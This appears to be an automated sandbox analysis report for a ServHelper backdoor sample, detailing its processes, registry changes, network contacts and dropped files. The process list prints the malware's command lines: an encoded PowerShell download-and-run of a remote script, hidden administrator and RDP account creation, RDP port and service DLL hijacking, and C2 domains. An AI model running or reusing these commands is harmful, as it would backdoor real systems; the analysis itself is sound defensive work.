Malware Analysis Report

2024-10-23 17:53

Sample ID 210902-tw1h5sage4
Target 472208d7ba18d4c14b7e90b9db5d6feb
SHA256 ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
Tags
servhelper backdoor discovery exploit persistence trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d

Threat Level: Known bad

The file 472208d7ba18d4c14b7e90b9db5d6feb was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence trojan upx

ServHelper

Grants admin privileges

Blocklisted process makes network request

Sets DLL path for service in the registry

UPX packed file

Possible privilege escalation attempt

Modifies RDP port number used by Windows

Loads dropped DLL

Modifies file permissions

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Script User-Agent

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Suspicious behavior: LoadsDriver

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-02 16:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-02 16:25

Reported

2021-09-02 16:55

Platform

win7-en

Max time kernel

1750s

Max time network

1772s

Command Line

"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KB6Y95K1TRVJZ3LP0BBS.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0a4dfb417a0d701 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1996 wrote to memory of 588 | N/A | C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1996 wrote to memory of 588 | N/A | C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1996 wrote to memory of 588 | N/A | C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 1056 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 588 wrote to memory of 1056 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 588 wrote to memory of 1056 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1056 wrote to memory of 936 | N/A | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1056 wrote to memory of 936 | N/A | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1056 wrote to memory of 936 | N/A | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 588 wrote to memory of 560 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 560 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 560 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 1160 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 1160 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 1160 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 792 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 792 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 792 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 1584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\takeown.exe
PID 588 wrote to memory of 1584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\takeown.exe
PID 588 wrote to memory of 1584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\takeown.exe
PID 588 wrote to memory of 1676 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1676 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1676 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1964 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1964 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1964 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1396 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1396 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1396 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 844 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 844 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 844 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1352 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1352 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1352 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1324 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1324 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1324 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 320 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 320 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 320 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1516 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1516 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1516 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\net.exe
PID 588 wrote to memory of 1812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\net.exe
PID 588 wrote to memory of 1812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\net.exe
PID 1812 wrote to memory of 936 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1812 wrote to memory of 936 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1812 wrote to memory of 936 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 588 wrote to memory of 1580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 588 wrote to memory of 1580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 588 wrote to memory of 1580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 1192 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 1192 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 1192 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1684 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe

"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zzulzwbo.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1047.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1046.tmp"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc iBs6lfst /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc iBs6lfst /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc iBs6lfst /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" KJUCCLUP$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" KJUCCLUP$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" KJUCCLUP$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc iBs6lfst

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc iBs6lfst

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc iBs6lfst

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

C:\Windows\System32\cmd.exe

cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes

C:\Windows\system32\net.exe

net user wgautilacc 111213

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc 111213

C:\Windows\system32\net.exe

net user wgautilacc /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc /active:yes

Network

Country | Destination | Domain | Proto
N/A | 69.195.124.227:80 | | tcp
N/A | 8.8.8.8:53 | 2no.co | udp
N/A | 88.99.66.31:443 | 2no.co | tcp
N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp
N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp
N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp
N/A | 8.8.8.8:53 | hitnaiguat.xyz | udp
N/A | 8.8.8.8:53 | whereihjeu3.xyz | udp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 5.181.156.4:443 | sagiai3agar.cn | tcp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 5.181.156.4:443 | sagiai3agar.cn | tcp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 5.181.156.4:443 | sagiai3agar.cn | tcp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 5.181.156.4:443 | sagiai3agar.cn | tcp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 5.181.156.4:443 | sagiai3agar.cn | tcp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 5.181.156.4:443 | sagiai3agar.cn | tcp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 5.181.156.4:443 | sagiai3agar.cn | tcp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 8.8.8.8:53 | sagiai3agar.cn | udp
N/A | 5.181.156.4:443 | sagiai3agar.cn | tcp

Files

memory/1996-52-0x0000000041650000-0x0000000041A70000-memory.dmp

memory/1996-55-0x00000000411B4000-0x00000000411B6000-memory.dmp

memory/1996-54-0x00000000411B2000-0x00000000411B4000-memory.dmp

memory/1996-56-0x00000000411B6000-0x00000000411B7000-memory.dmp

memory/1996-57-0x00000000411B7000-0x00000000411B8000-memory.dmp

memory/588-58-0x0000000000000000-mapping.dmp

memory/588-59-0x000007FEFBBC1000-0x000007FEFBBC3000-memory.dmp

memory/588-60-0x000007FEEB060000-0x000007FEEBBBD000-memory.dmp

memory/588-61-0x00000000023F0000-0x00000000023F2000-memory.dmp

memory/588-62-0x00000000023F2000-0x00000000023F4000-memory.dmp

memory/588-63-0x00000000023F4000-0x00000000023F7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

